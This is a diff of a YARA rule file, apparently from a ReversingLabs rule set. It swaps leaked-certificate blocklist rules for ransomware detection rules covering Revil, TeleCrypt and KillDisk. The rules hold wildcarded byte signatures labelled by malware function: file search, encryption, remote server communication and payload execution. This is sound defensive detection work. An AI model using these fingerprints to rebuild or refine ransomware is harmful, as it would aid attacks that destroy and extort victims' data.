+            ?? A3 ?? ?? ?? ?? 53 57 FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 8B 1F 83 C7 ?? 53 6A
+            ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ?? ?? ?? ?? A3 ?? ?? ?? ?? 53 57
+            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 FB 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
+            ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7 ?? 6A ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C7
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 5B C9 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "f8:c2:23:9d:e3:97:7b:8d:4a:3d:cb:ed:c9:03:1a:51" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $extract_rsrc_v1 ) and ( all of ( $search_and_encrypt_v1_p* ) ) ) or ( ( $extract_rsrc_v2 ) and ( all of ( $search_and_encrypt_v2_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Caad8222705D3Fb3430E114A31C8C6A4 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Revil : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Revil ransomware."
 		author = "ReversingLabs"
-		id = "d95b5e25-679c-57f8-b790-8f5633a23e4b"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "67c2f49e-b9dc-5900-a89d-49ba41088ac3"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1290-L1306"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Revil.yara#L1-L101"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "35c4f46322da4f5b9f938c1098c8e57effc8abfc03db865190c343df7b8990ea"
+		logic_hash = "24a79477eb797d7a7121d1248ebbece833ccd256de55729ff96084135ce8d426"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Revil"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 33 C0 57 8B 7D ?? 8B D8 50 56 89 45 ?? 89
+            5D ?? 89 45 ?? 89 45 ?? FF 57 ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 56 50 E8 ??
+            ?? ?? ?? 53 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? E9 ?? ?? ?? ?? 8B 45 ??
+            0B 45 ?? 74 ?? FF 33 56 E8 ?? ?? ?? ?? 8B F3 8B 5B ?? 89 5D ?? FF 36 E8 ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 83 C0 ?? 89 45 ?? 83 D1 ?? 0B C1 89 4D
+            ?? 75 ?? 21 45 ?? 8B 75 ?? 33 C0 40 85 C0 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 04
+            24 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ??
+            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8D 04 46 50 E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 59
+            74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 57 ?? 83 C4 ?? 85
+            C0 74 ?? 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 77 ?? FF 57 ?? 83
+            C4 ?? 01 47 ?? 11 57 ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 50 89 45 ?? 8D 85
+            ?? ?? ?? ?? 53 50 56 FF 57 ?? 83 C4 ?? 85 C0 74 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 53 50
+            56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? 83 3F ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
+            FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 5D
+            ?? 83 3F ?? 0F 84 ?? ?? ?? ?? EB ?? 8B F3 8B 5B ?? FF 36 E8 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 59 59 85 DB 75 ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C0 66 89 85 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 56 56 56 56 50 FF 15 ?? ?? ?? ?? 8B F8 33 C0 89 7D ?? 85 FF 0F 84 ?? ??
+            ?? ?? 66 89 45 ?? 33 C9 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 56 FF 75 ?? 41 89 75 ??
+            89 75 ?? 89 75 ?? 89 75 ?? 89 4D ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89 75 ?? 89
+            4D ?? 89 75 ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 33 C0 E9
+            ?? ?? ?? ?? 8B 4D ?? 33 D2 8B 45 ?? 53 56 66 89 14 41 FF 75 ?? FF 75 ?? 57 FF 15 ??
+            ?? ?? ?? 8B D8 89 5D ?? 85 DB 75 ?? 57 EB ?? 8B 45 ?? 66 39 30 75 ?? 6A ?? 59 66 89
+            08 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
+            C0 83 7D ?? ?? B9 ?? ?? ?? ?? 66 89 45 ?? 0F 44 C1 0D ?? ?? ?? ?? 50 56 56 56 FF 75
+            ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 8B D8 85 DB 75 ?? 57 FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FE 50 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 45 ?? 56 FF 75 ?? 8D 85
+            ?? ?? ?? ?? FF 75 ?? FF 75 ?? 6A ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E8 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 53 FF 15 ?? ??
+            ?? ?? 85 C0 6A ?? 58 0F 45 F8 85 FF 75 ?? 8B 45 ?? 56 53 89 30 FF 15 ?? ?? ?? ?? 8B
+            7D ?? 85 C0 74 ?? 56 8D 45 ?? 89 75 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 68 ??
+            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? F7 D8 1B C0 23 45 ?? 89 01 3D ?? ?? ?? ?? 75
+            ?? FF 75 ?? 53 E8 ?? ?? ?? ?? 59 59 8B F0 57 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
+            ?? ?? 53 FF 15 ?? ?? ?? ?? 8B C6 5B 5F 5E 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 51 83 7D ?? ?? 53 56 57 BB ?? ?? ?? ?? 7F ?? 7C ?? 39 5D ?? 73 ?? 8B 5D ??
+            8B 7D ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 59 59 EB ?? E8 ?? ?? ?? ?? 83 F8 ??
+            75 ?? 6A ?? E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 85
+            F6 74 ?? 89 9E ?? ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? EB ?? 33 C0 EB ?? E8 ?? ??
+            ?? ?? 8B 55 ?? 8B CA 4A 89 55 ?? 85 C9 74 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 83
+            F8 ?? 74 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 56 E8 ??
+            ?? ?? ?? 8B C6 59 5F 5E 5B 8B E5 5D C3 56 57 E8 ?? ?? ?? ?? 59 33 C0 EB
+        }
+		$enum_resources = {
+            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74
+            ?? 33 C0 E9 ?? ?? ?? ?? 83 4D ?? ?? B8 ?? ?? ?? ?? 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B
+            F8 59 85 FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 33 C0 EB ?? 53 56 8D 45 ?? 50 57 8D 45
+            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 33 DB 39 5D ?? 76 ?? 8D 77 ??
+            83 7E ?? ?? 75 ?? FF 75 ?? FF 36 E8 ?? ?? ?? ?? 59 59 F6 46 ?? ?? 74 ?? 8D 46 ?? 50
+            FF 75 ?? E8 ?? ?? ?? ?? 59 59 43 83 C6 ?? 3B 5D ?? 72 ?? 8B 45 ?? 3D ?? ?? ?? ?? 75
+            ?? 57 E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 5E 1B C0 40 5B 5F 8B E5 5D
+            C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "ca:ad:82:22:70:5d:3f:b3:43:0e:11:4a:31:c8:c6:a4" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( $search_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B191812516E6618D49E6Ccf5E63Dc343 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Telecrypt : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects TeleCrypt ransomware."
 		author = "ReversingLabs"
-		id = "8f316011-9a29-5366-a26a-1fe20651ef17"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c4eada2d-72c0-5efe-bf2b-8f053348d89d"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1308-L1324"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.TeleCrypt.yara#L1-L109"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "40c03e683b4b8e8a23ca84da7dfd3bd998d3708b27b7df7a22f25fb364c3a69b"
+		logic_hash = "9d856eae4369cd7ba1d88bd6ef37931e069127e2c05a84a44f5274f681e83fc0"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "TeleCrypt"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file = {
+            57 E8 ?? ?? ?? ?? 89 03 EB ?? 6A ?? E8 ?? ?? ?? ?? 89 03 66 83 BB ?? ?? ?? ?? ?? 0F
+            85 ?? ?? ?? ?? 8B 03 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 81 7B ?? ?? ?? 75 ?? E8 ??
+            ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 43 ?? ?? ??
+            ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 6A ?? 6A ?? 50 8D 43 ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75
+            ?? 66 C7 43 ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 89 03 66 81 7B ?? ?? ?? 0F
+            85 ?? ?? ?? ?? 66 C7 43 ?? ?? ?? 6A ?? 8B 03 50 E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ??
+            8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 85 FF 7D ?? 33 FF 6A ??
+            6A ?? 57 8B 03 50 E8 ?? ?? ?? ?? 40 74 ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 83
+            ?? ?? ?? ?? 50 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ??
+            ?? ?? ?? F6 43 ?? ?? 74 ?? 83 3C 24 ?? 76 ?? 8B 14 24 4A 85 D2 72 ?? 42 33 FF 8D 83
+            ?? ?? ?? ?? 80 38 ?? 75 ?? 6A ?? 6A ?? 8B C7 2B 44 24 ?? 50 8B 03 50 E8 ?? ?? ?? ??
+            40 74 ?? 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 EB ?? 47 40
+            4A 75 ?? 66 83 BB ?? ?? ?? ?? ?? 75 ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? 66
+            81 7B ?? ?? ?? 74 ?? 8B 03 50 E8
+        }
+		$server_communication = {
+            6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ??
+            8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 80 ?? ?? ?? ??
+            33 C9 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 33 DB 8B CB B8 ?? ?? ??
+            ?? D3 E0 85 F0 74 ?? 8D 45 ?? 8B D3 66 83 C2 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 43 83 FB ?? 75 ?? A1 ?? ??
+            ?? ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
+            38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 4E 75 ?? A1 ?? ?? ?? ?? 8B 10
+            FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 6A ?? 6A ?? 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B
+            38 FF 57 ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 43 4E 75 ?? 8D 55 ?? B8
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ??
+            ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55
+            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8
+        }
+		$server_communication_1 = {
+            55 8B EC 33 C9 51 51 51 51 51 53 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A
+            ?? 8D 45 ?? 50 33 C9 BA ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ??
+            50 8D 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ??
+            ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 33 C9 8B 83 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 33 D2 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$exec_payload = {
+            55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ??
+            E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? C3
+        }
+		$copy_payload = {
+            55 8B EC 6A ?? 6A ?? 6A ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ??
+            ?? ?? ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50
+            8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59
+            59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$generate_strings_to_encrypt = {
+            0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D
+            85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ??
+            ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45
+            ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ??
+            ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B
+            45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ??
+            ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ??
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:91:81:25:16:e6:61:8d:49:e6:cc:f5:e6:3d:c3:43" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $generate_strings_to_encrypt and $encrypt_file and $server_communication and $exec_payload ) or ( $encrypt_file and $server_communication_1 and $copy_payload ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Ba7Fb8Ee1Deff8F4A1525E1E0580057 : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Killdisk : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects KillDisk ransomware."
 		author = "ReversingLabs"
-		id = "af912c64-334d-51f5-8ca4-707fcec512ba"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "af6652dd-c668-5ae1-b51b-e272cb440c20"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1326-L1342"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.KillDisk.yara#L1-L144"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "324157b9fec2653cb8874c7a1a5b6e39b121992cd52856b8c4a2a8b7cee86a69"
+		logic_hash = "3ed1fb2b7b24cd4d5100d93ed53a9ab28e1482bd0998a0538d8710a962ee839f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "KillDisk"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_1 = {
+            55 48 89 E5 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 64 48 8B 04 25 ?? ?? ?? ?? 48
+            89 45 ?? 31 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8B 85
+            ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 85 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ??
+            ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 85 C0 79 ?? 48 8B
+            85 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 ?? ??
+            ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 85 C0 78 ?? 48 8B 85 ?? ?? ?? ?? BE ??
+            ?? ?? ?? 48 89 C7 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 8B 05 ?? ?? ?? ??
+            85 C0 79 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 48 8D 90 ?? ?? ?? ?? 48 85 C0
+            48 0F 48 C2 48 C1 F8 ?? 48 89 85 ?? ?? ?? ?? 48 8B 45 ?? 48 85 C0 7E ?? 48 83 BD ??
+            ?? ?? ?? ?? 7F ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ??
+            ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 48
